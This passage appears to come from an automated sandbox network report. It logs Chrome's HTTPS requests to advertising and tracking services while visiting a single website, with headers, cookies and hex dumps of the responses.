                                                                                                                                                                                                                                                                                                                                                                          Location: https://us-u.openx.net/w/1.0/cm?id=e508c905-ddce-4732-92a4-0b0f5b72a28f&r=https%3A%2F%2Fidsync.rlcdn.com%2F396846.gif%3Fserved_by%3Devergreen%26partner_uid%3D
                                                                                                                                                                                                                                                                                                                                                                          P3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: pxrc=CIbBs7gGEgYIuOsBEAA=; Path=/; Domain=rlcdn.com; Expires=Fri, 13 Dec 2024 09:12:38 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          69192.168.2.74979035.204.89.2384432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC645OUTGET /dpx?cid=11411&us_privacy=&33random=1728897157218.2&ref=https%3A%2F%2Fald.my.id%2F HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: i.simpli.fi
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC157INHTTP/1.1 410 Gone
                                                                                                                                                                                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 542
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC542INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friend


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          70192.168.2.74978935.204.89.2384432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC645OUTGET /dpx?cid=11411&us_privacy=&33random=1728897157218.5&ref=https%3A%2F%2Fald.my.id%2F HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: i.simpli.fi
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC157INHTTP/1.1 410 Gone
                                                                                                                                                                                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 542
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC542INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friend


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          71192.168.2.74980135.156.11.1554432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC402OUTGET /pd/dtscout HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pd.sharethis.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: __stid=ZHoAA2cM4IQAAAAICdw7Aw==; __stidv=2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC233INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains;
                                                                                                                                                                                                                                                                                                                                                                          X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 2444
                                                                                                                                                                                                                                                                                                                                                                          Connection: Close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC2444INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 74 72 79 20 7b 0a 0a 20 20 20 20 2f 2f 20 73 65 74 20 75 70 20 6f 75 72 20 70 69 78 65 6c 0a 20 20 20 20 76 61 72 20 66 63 6d 70 20 3d 20 74 79 70 65 6f 66 20 5f 5f 63 6d 70 20 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 3b 0a 20 20 20 20 76 61 72 20 66 63 6d 70 76 32 20 3d 20 74 79 70 65 6f 66 20 5f 5f 74 63 66 61 70 69 20 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 3b 0a 20 20 20 20 76 61 72 20 72 6e 64 20 3d 20 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 0a 20 20 20 20 76 61 72 20 69 6d 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 69 6d 67 27 29 3b 0a 20 20 20 20 76 61 72 20 65 78 70 74 69 64 20 3d 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 27 5a 48 6f 41 41
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (function () { try { // set up our pixel var fcmp = typeof __cmp == 'function'; var fcmpv2 = typeof __tcfapi == 'function'; var rnd = Math.random(); var img = document.createElement('img'); var exptid = encodeURIComponent('ZHoAA


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          72192.168.2.74980767.202.105.314432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC925OUTGET /deb/v2?id=wu!&dn=AFWU&cc=1&chpv=10.0.0&chuav=Google%20Chrome%3Bv%3D117.0.5938.134%2C%20Not%3BA%3DBrand%3Bv%3D8.0.0.0%2C%20Chromium%3Bv%3D117.0.5938.134&chp=Windows&chmob=0&chua=Google%20Chrome%3Bv%3D117%2C%20Not%3BA%3DBrand%3Bv%3D8%2C%20Chromium%3Bv%3D117&r=https%3A%2F%2Fald.my.id%2F&pu=https%3A%2F%2Fald.my.id%2F HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: de.tynt.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: uid=OY/j22cM4IWn+sRSNrMbgw==; pids=%5B%7B%22p%22%3A%220c1ae001bf%22%2C%22f%22%3A3%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%224bbb341d17%22%2C%22f%22%3A1%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%22e9b03986ff%22%2C%22f%22%3A2%2C%22ts%22%3A1728897157218%7D%5D
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1321INHTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false
                                                                                                                                                                                                                                                                                                                                                                          expires: Sat, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          accept-ch: Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Model, Sec-CH-UA-Full-Version-List, Sec-CH-UA, Sec-CH-UA-Mobile
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: pids=%5B%7B%22p%22%3A%22fcb82aaae3%22%2C%22f%22%3A1%2C%22ts%22%3A1728897158378%7D%2C%7B%22p%22%3A%22607295b4a4%22%2C%22f%22%3A1%2C%22ts%22%3A1728897158378%7D%2C%7B%22p%22%3A%220c1ae001bf%22%2C%22f%22%3A3%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%224bbb341d17%22%2C%22f%22%3A1%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%22b32ef6f991%22%2C%22f%22%3A1%2C%22ts%22%3A1728897158378%7D%2C%7B%22p%22%3A%22002f98d420%22%2C%22f%22%3A1%2C%22ts%22%3A1728897158378%7D%2C%7B%22p%22%3A%2237c1336dc9%22%2C%22f%22%3A1%2C%22ts%22%3A1728897158378%7D%2C%7B%22p%22%3A%22d9fe068602%22%2C%22f%22%3A1%2C%22ts%22%3A1728897158378%7D%2C%7B%22p%22%3A%22179d15a463%22%2C%22f%22%3A1%2C%22ts%22%3A1728897158378%7D%2C%7B%22p%22%3A%22e9b03986ff%22%2C%22f%22%3A2%2C%22ts%22%3A1728897157218%7D%5D;Version=1;Comment=;SameSite=None;Domain=tynt.com;Path=/;Max-Age=7776000;Secure
                                                                                                                                                                                                                                                                                                                                                                          content-type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          content-length: 1567
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
                                                                                                                                                                                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC1567INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 2c 64 3d 64 6f 63 75 6d 65 6e 74 2c 70 3d 22 75 6e 73 61 66 65 2d 75 72 6c 22 2c 65 2c 73 2c 74 2c 75 3d 5b 22 68 74 74 70 73 3a 2f 2f 70 73 2e 65 79 65 6f 74 61 2e 6e 65 74 2f 70 69 78 65 6c 3f 70 69 64 3d 67 64 6f 6d 67 35 31 26 74 3d 67 69 66 26 63 61 74 3d 42 75 73 69 6e 65 73 73 26 75 73 5f 70 72 69 76 61 63 79 3d 26 72 61 6e 64 6f 6d 3d 31 37 32 38 38 39 37 31 35 38 33 37 38 2e 31 22 2c 22 68 74 74 70 73 3a 2f 2f 70 78 2e 61 64 73 2e 6c 69 6e 6b 65 64 69 6e 2e 63 6f 6d 2f 64 62 5f 73 79 6e 63 3f 70 69 64 3d 31 35 39 32 37 26 70 75 75 69 64 3d 4f 59 25 32 46 6a 32 32 63 4d 34 49 57 6e 25 32 42 73 52 53 4e 72 4d 62 67 77 25 33 44 25 33 44 26 75 73 5f 70 72 69 76 61 63 79 3d 26 5f 72 61 6e 64 3d 31 37
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (function(){var i,d=document,p="unsafe-url",e,s,t,u=["https://ps.eyeota.net/pixel?pid=gdomg51&t=gif&cat=Business&us_privacy=&random=1728897158378.1","https://px.ads.linkedin.com/db_sync?pid=15927&puuid=OY%2Fj22cM4IWn%2BsRSNrMbgw%3D%3D&us_privacy=&_rand=17


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          73192.168.2.7498133.33.220.1504432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC619OUTGET /track/cmf/generic?ttd_pid=xksw9la&ttd_tpi=1&gdpr=0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: match.adsrvr.org
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC486INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 181
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          server: Kestrel
                                                                                                                                                                                                                                                                                                                                                                          location: https://match.adsrvr.org/track/cmb/generic?ttd_pid=xksw9la&ttd_tpi=1&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: TDID=7d931d72-b6cd-40d8-9aaa-91033ac03d95; expires=Tue, 14 Oct 2025 09:12:38 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: TDCPM=CAEYBSgCMgsI0p-yyuKOtj0QBTgB; expires=Tue, 14 Oct 2025 09:12:38 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC181INData Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 74 63 68 2e 61 64 73 72 76 72 2e 6f 72 67 2f 74 72 61 63 6b 2f 63 6d 62 2f 67 65 6e 65 72 69 63 3f 74 74 64 5f 70 69 64 3d 78 6b 73 77 39 6c 61 26 74 74 64 5f 74 70 69 3d 31 26 67 64 70 72 3d 30 22 3e 68 74 74 70 73 3a 2f 2f 6d 61 74 63 68 2e 61 64 73 72 76 72 2e 6f 72 67 2f 74 72 61 63 6b 2f 63 6d 62 2f 67 65 6e 65 72 69 63 3f 74 74 64 5f 70 69 64 3d 78 6b 73 77 39 6c 61 26 74 74 64 5f 74 70 69 3d 31 26 67 64 70 72 3d 30 3c 2f 61 3e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Redirecting to: <a href="https://match.adsrvr.org/track/cmb/generic?ttd_pid=xksw9la&ttd_tpi=1&gdpr=0">https://match.adsrvr.org/track/cmb/generic?ttd_pid=xksw9la&ttd_tpi=1&gdpr=0</a>


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          74192.168.2.749822172.67.74.1864432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC524OUTGET /widget/?d=1040172889715587758A2B28B3F6BBD2&nid=300&p=2114454483&t=240&s=1280x1024x24&u=https%3A%2F%2Fald.my.id%2F&r=https%3A%2F%2Fald.my.id%2F HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: t.dtscdn.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: uid=1040172889715587758A2B28B3F6BBD2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC820INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: uid=1040172889715587758A2B28B3F6BBD2; Domain=dtscdn.com; Expires=Fri, 11-Apr-2025 09:14:45 GMT; Max-Age=15465600; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                                                                                                          X-T: 1.18
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 14 Oct 2024 09:14:44 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                          x-server: web15.ny1.dtscdn.com
                                                                                                                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kPy8ClRCvmmOXQ07IBh9B5B020B77YWATskQmehQ6hoE1Jy1JrX5M2yAn2EL6zYUwA1tXg56SPUU7khJYQPrAfTS69lRX%2FOSrb%2Fpf8WOmCqTY%2FWyvYypafXTCxNsyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                          CF-RAY: 8d2672e8999642bd-EWR
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          75192.168.2.749811142.250.185.1944432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC2863OUTGET /pagead/adview?ai=CtiHwhOAMZ46MNdLp78EPn-jPyQnboZvOeo-Yz9CQE6yFu4fTOBABIKuv2JABYMkGoAGlxfPnA8gBAagDAcgDywSqBPYBT9Cep1guQNdWpPsrmNwBIZ2KcXe07fxUOlQoQaI0RONvZdfXKhZbO6f9rnrbOMDO2JUpIadxb9srUNd2EBCTqAdj3bLPaSgZ3jIVIzl7UU-IOFO-V5Pq9ASgMq0BtJZFMZtnquXJX1jNN5ovREKhjebK0Q2wP9xqO6BvKPIxFbDLSB9rwzaBdV3TiycQPFc9dN1KSBU7y9IVonucXuTQenZiUDUbEqL70-SjNPPllWiqjrLsIa4giBKMUBVgzttceF9DcNJAXT_EQ1EZbIvirQl9N7dDWyKg4AUS43spAXbfbAAhQI0ZXvSgf8nZldvdjThdeSvqwAT4h4n_hwWIBYO-m49RkgUECAQYAZIFBAgFGASgBi6AB8O6jBioB9XJG6gH2baxAqgHpr4bqAeOzhuoB5PYG6gH8OAbqAfulrECqAf-nrECqAevvrECqAf3wrEC2AcB8gcEEI2GdNIIJgiAYRABGB8yAooCOguAQIDAgICAoKiAAki9_cE6WNiQjOfDjYkDmglMaHR0cHM6Ly9nZXQubWFuYWdlZG1ldGhvZHMuY29tL2sxMi1jeWJlcnNlY3VyaXR5LXNhZmV0eS1rMTJkaXZlP2dhZF9zb3VyY2U9NYAKAcgLAdoMEQoLENDnsMekuoOYgwESAgED2BMK0BUBmBYBgBcBshceChoIABIUcHViLTI1NDI4ODQyOTIxNzQ5MTEYABgBuhcCOAGyGAkSAqRmGC4iAQDQGAE&sigh=cJUMEGU_6cU&uach_m=%5BUACH%5D&ase=2&cid=CAQSTwDpaXnfhIVrKubni22jrvJ193s0SUtKenR05Ckkb7AzizqZ1SmYpmZnI8rh5H_O6MTsFcTZgu04yoCtRSVKUMBwl229eFS4BBBIVgak2CYYAQ&t [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          Host: googleads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Attribution-Reporting-Eligible: event-source=navigation-source, trigger
